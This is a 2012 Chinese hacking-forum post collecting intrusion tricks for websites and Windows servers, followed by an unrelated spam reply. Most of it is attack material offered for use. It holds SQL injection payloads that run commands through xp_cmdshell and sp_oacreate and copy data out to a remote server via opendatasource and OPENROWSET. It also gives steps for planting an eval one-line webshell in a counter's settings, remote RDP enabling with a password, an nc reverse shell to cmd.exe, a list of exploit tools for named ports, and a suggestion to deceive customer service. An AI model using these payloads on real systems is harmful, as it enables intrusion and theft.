找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3391|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
2 x7 \$ q9 Q# r1 [+ A. D9 V, D* w5 {. j' B
  p6 a3 x5 G' H+ Y" @
SA点数据库分离搞法+语句:$ W8 x& Y9 w5 G8 k0 ~* g

2 _9 ~3 B/ Q1 b* |' B4 b注射点不显错,执行下面三条语句页面都返回正常。
/ M9 C. z4 t6 e9 r& m& Gand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
* X8 W/ d; _2 U8 n8 y; b* G& y  {7 Pand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')# C# x' ?+ N* k/ |9 o6 C, L* x
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
5 X! R! ], F- A& s3 V! q, t可以列目录,判断系统为2000,web与数据库分离2 i  D4 ~  d: U% H+ x  u1 }
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。$ j0 b2 |, K# M
在注射点上执行
, o' D. ~4 ?8 M  O" _1 j1 w% y/ Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
1 R6 l% Z! N4 {& L; {6 ]0 C/ e页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
/ j' J* c/ [+ ?8 U5 Q- A还有我用NC监听得其他端口都没有得到IP。
8 w3 A0 `% x1 K2 u) }) T. X5 ]( a+ g& R% g8 b4 ?
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
6 ~. @, k$ E& ?" z: o& {2 k'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--( k$ j. Z9 s  h3 l

# O" Q' Y; S" j: m  m- K6 z$ n# H;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--' c! h- u; B- I5 P) l/ F+ s. U! A
0 P+ y, }: A1 C' Z: X/ F
现在就猜想是不是数据库是内网而且不能连外网。
* x, B& ~# d* S0 v
" l" t; z  S/ i- L' ]- I, e  J+ X; r
access导出txt文本代码+ S6 o& y8 B' K* l$ G' w; T
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
2 O; s1 q" i  F3 b1 `
( v, E( n% x0 e% q9 N3 `2 Y; |3 F) i+ c1 n# _% G9 F
5 H2 r- u6 A& x. e0 p! \
自动跳转到指定网站代码头
: \8 X$ l! `6 F# ]! \$ O& _<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>6 o  M& s! Z1 [4 v
- ?" @6 `% H: A7 Q

+ o' o( _3 @; p& W' j$ @入侵java or jsp站点时默认配置文件路径:
) x' Z/ M: [9 t7 C% _1 z; v0 ~( ~; g\web-inf\web.xml
. ^) O. \3 F) b; a8 dtomcat下的配置文件位置:: }; _  H/ r: {0 \$ \% X2 I; V
\conf\server.xml            (前面加上tomcat路径)0 r$ X9 c! H; |8 k5 N
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
! j! s* w9 B, Z6 B. g7 c# U6 c! X  G0 r/ y3 C

( O( g9 x+ l" B3 i, Z
. c' O* K, U) t' S检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:2 L5 _" N) c# D4 ^
-1%23
: \5 r1 p; ?9 ^> 7 q' f! L. x% V+ r1 M
<
# |1 {( H8 x) k2 V1'+or+'1'='1% u6 X! P+ K& t$ J) j% m
id=8%bf5 k! F2 _5 F9 z( v+ ]

# i* ^& Y3 {: }; b/ P: n% o全新注入点检测试法:2 i$ ?9 n( s' h' z4 f
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
6 Z4 Q$ ^5 m: b. ]: k! f/ [3 C! Y2 K' z% P+ D: d$ @: i
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
" f, K4 [  L: B# Z
8 H  Y! [4 k* l5 U) f, \+ I; \$ q  q搜索型注入判断方法:# v: l: ]2 r4 n0 `% M9 D. k
北京%' and '1'='1' and '%'=': w6 A- e# E( b, Y$ p
北京%' and '1'='2' and '%'='
6 x9 ~( C  i; x  A( q2 S4 j9 q% [2 v  r1 O) \% N4 m

. l+ M  V( O* E7 HCOOKIES注入:
" I$ Y; r' T8 A4 J+ b, T, z- K# R- k. D1 R
javascript:alert(document.cookie="id="+escape("51 and 1=1"));  h8 p2 l0 n5 B: Z3 \
: G$ Z3 V% g: L# T
2000专业版查看本地登录用户命令:
5 P- A8 s& O6 {; k7 z6 I) S! Znet config workstation1 h5 B- W* {7 M* C

* \4 ?+ }& \9 i9 G. z% L* M
: r* W& Q( t. b2003下查看ipsec配置和默认防火墙配置命令:
2 s9 J7 z* j1 C% N" W5 d3 Wnetsh firewall show config. n2 Q/ k' H' X' O; p$ n
netsh ipsec static show all! u& e. h0 h& F
6 Q1 ?8 _8 N4 J/ \. z* Y, G
不指派指定策略命令:, G; {7 `1 q) z) C
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)( v7 s* E. ?' {; ^
netsh ipsec static show policy all  显示策略名5 ^' e/ k" ~- A1 @( ]" `$ N

7 u' c  u- }9 Z5 X! P4 p1 x7 O" s. `. a# P7 {
猜管理员后台小技巧:6 i' Y6 T, w0 L7 ?" U9 ]
admin/left.asp / K0 [, i2 j' x& Y
admin/main.asp- C3 h) F: h: o
admin/top.asp& O4 ]& d) D' E! a
admin/admin.asp
! G  O+ ?) t, ]! j6 Z会现出菜单导航,然后迅雷下载全部链接
1 z: G0 b) {0 e& s' _. q0 E7 ~
; F4 a7 }/ e9 K( {2 o
) T9 O0 v0 P7 E) {8 v, @社会工程学:! t& u3 u- W2 r- d
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
7 U+ Z  y, S5 H然后去骗客服
. ~+ ~2 y: A1 a; ]9 ~. y$ E8 g! X3 Y* L1 h) j

- E" `8 ?! ~" G5 k- T统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 8 J6 o7 j# [1 Z& e4 }& y
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, + ~- D: O. P1 Q6 H2 I7 h0 u5 z- g
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
; D, [/ [; H3 S$ ]8 O" d+ f4 h

$ M0 a% @) n0 A0 v6 E9 M5 i
0 x4 l$ E4 Y/ O% _% G6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
- _) P2 W: L# u' |2 \3 b% B
4 \8 a! h7 j: R5 [8 s  w8 s$ z; p
/ R! T% G( k9 Y( |! o
CMD加密注册表位置+ X+ t9 I1 ?3 B  ?
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor4 U2 I3 m7 }, \' l
AutoRun3 h5 v6 F  }4 W( i$ M$ |8 K4 v

; X! Y$ i1 f8 x3 c) V8 v. a(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
7 a( N$ f6 f3 i* I# l& ~  DAutoRun
- w+ @! Y" {; [, h/ K6 ~. `1 n& A, c

. g5 O! A+ z8 k' r1 s在找注入时搜索Hidden,把他改成test! a. E3 o- q( ]1 G  v
: N. j0 y1 C- u1 u. b; L3 s  Q2 S
$ ~1 @# s8 b; V. w- g8 L

% M* u% |2 P0 [" j7 ^+ a; r" Zmstsc /v:IP /console ( P" I. b6 y) I+ O' y8 K$ E

# t$ R! @; ]6 {& Q
0 ~( v( J+ a- E: h0 n$ f一句话开3389:4 ~; m7 v# c5 _8 Q' Q& e0 F6 O

  u1 I  p: z- q# Y4 P1 K0 L. t最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
4 q2 r8 U5 Z/ m6 ~2 D开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
: M# ]) |; X0 v1 p4 D+ G8 m) u/ C1 h! ?5 h3 v" L
2 H: |, o0 b3 y) z) w
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:! z# ^/ {/ z+ a0 p
Insert into admin(user,pwd) values('test','test')
! v4 F: c% z0 S1 X# Q0 e& z  B) u% f) @3 r5 G
7 C5 X# L# c6 ~3 X; _
NC反弹
# N) H' U" G3 S. |* J- A先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   ! q- a" h' S: Q1 a" ~) M
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
! z. C( z9 q- Y, V/ N" X( e3 V6 @1 h6 V/ v

# u, L, u. K9 N, \( E在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
0 h) h$ _/ ]5 `
9 m, Q/ ~" v' H) K$ P9 {有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
5 R% v6 Y8 P- R2 d7 M* V0 v9 F) X例如:
2 o1 x" d9 N8 W  asubst k: d:\www\ 用d盘www目录替代k盘
4 t* g, T$ E  l- Y6 m$ {# {% hsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表